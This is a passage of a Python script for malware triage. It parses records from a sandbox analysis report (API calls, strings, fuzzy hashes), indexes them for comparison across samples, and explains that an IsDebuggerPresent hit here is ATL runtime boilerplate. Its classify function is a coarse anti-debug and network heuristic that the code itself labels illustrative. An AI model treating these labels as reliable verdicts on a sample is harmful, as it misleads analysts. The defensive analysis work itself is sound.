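# Diagnostic emitted by ATL's CAtlBaseModule constructor when its critical section
# cannot be initialised: compiler-runtime boilerplate, not custom anti-debugging.
ATL_CS_ERROR = "ERROR : Unable to initialize critical section in CAtlBaseModule"

# Constructed sample: two records copied from the listing above, with the
# 'Associated' dump lines and duplicated Opcode/Instruction ID lines left out.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2255
Strings
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Instruction Fuzzy Hash: CD11E070641229BAEB298F518C95FFBFBACFF06751F10862AFA2456040D2706881D7F1
APIs
  • Part of subcall function 009BB314: _memset.LIBCMT ref: 009BB321
  • Part of subcall function 009A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB2F0,?,?,?,0098100A), ref: 009A0945
• IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB2FE
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Instruction Fuzzy Hash: 23E06D742007108FD770DF68E5043867AE8AF84724F018A3DE456C7681E7F5E405CBA1
"""

@dataclass
class Record:
    calls: list = field(default_factory=list)       # direct and subcall API references
    strings: list = field(default_factory=list)
    source_file: str = ""
    similarity: dict = field(default_factory=dict)

    def api_names(self):
        return {c["name"] for c in self.calls}

def _parse_call(text, via=None):
    m = CALL_RE.match(text)
    if not m:
        return None
    args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
    return {"name": m["name"], "module": m["module"], "args": args, "ref": m["ref"].upper(), "via": via}

def parse_records(text):
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if section == "APIs":                  # every record opens with 'APIs'
                cur = Record()
                records.append(cur)
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                sub = SUBCALL_RE.match(body)
                call = _parse_call(sub["rest"], sub["fn"].upper()) if sub else _parse_call(body)
                if call:
                    cur.calls.append(call)
            elif section == "Strings" and (m := STRING_RE.match(body)):
                cur.strings.append({"text": m["text"], "xref": m["ref"].upper()})
            elif section == "Memory Dump Source" and body.startswith("Source File:"):
                cur.source_file = body.split(":", 1)[1].split(",", 1)[0].strip()
            elif section == "Similarity" and (m := KV_RE.match(body)):
                cur.similarity[m["key"].strip()] = m["value"].strip()
    return records

def classify(record):
    # Coarse triage label (heuristic, added here for illustration).
    names, texts = record.api_names(), {s["text"] for s in record.strings}
    if {"IsDebuggerPresent", "OutputDebugStringW"} <= names and ATL_CS_ERROR in texts:
        return "atl-runtime-artifact"
    if "IsDebuggerPresent" in names:
        return "anti-debug"
    if any(c["module"] == "WININET" for c in record.calls):
        return "network"
    return "other"

def index_by(records, key="Instruction Fuzzy Hash"):
    idx = {}                                   # Similarity value -> records, for cross-sample pivots
    for r in records:
        if r.similarity.get(key):
            idx.setdefault(r.similarity[key], []).append(r)
    return idx
```

Feeding the whole listing into parse_records gives one Record per function; index_by keyed on "Instruction Fuzzy Hash" (or "Opcode Fuzzy Hash") is the lookup to run against other reports when checking whether a function is shared runtime code or sample-specific. The raw argument list is kept so constants can be checked by hand: in the first record, the 0x32 passed to InternetSetOptionW is INTERNET_OPTION_CONNECTED_STATE and the 8-byte buffer length matches INTERNET_CONNECTED_INFO.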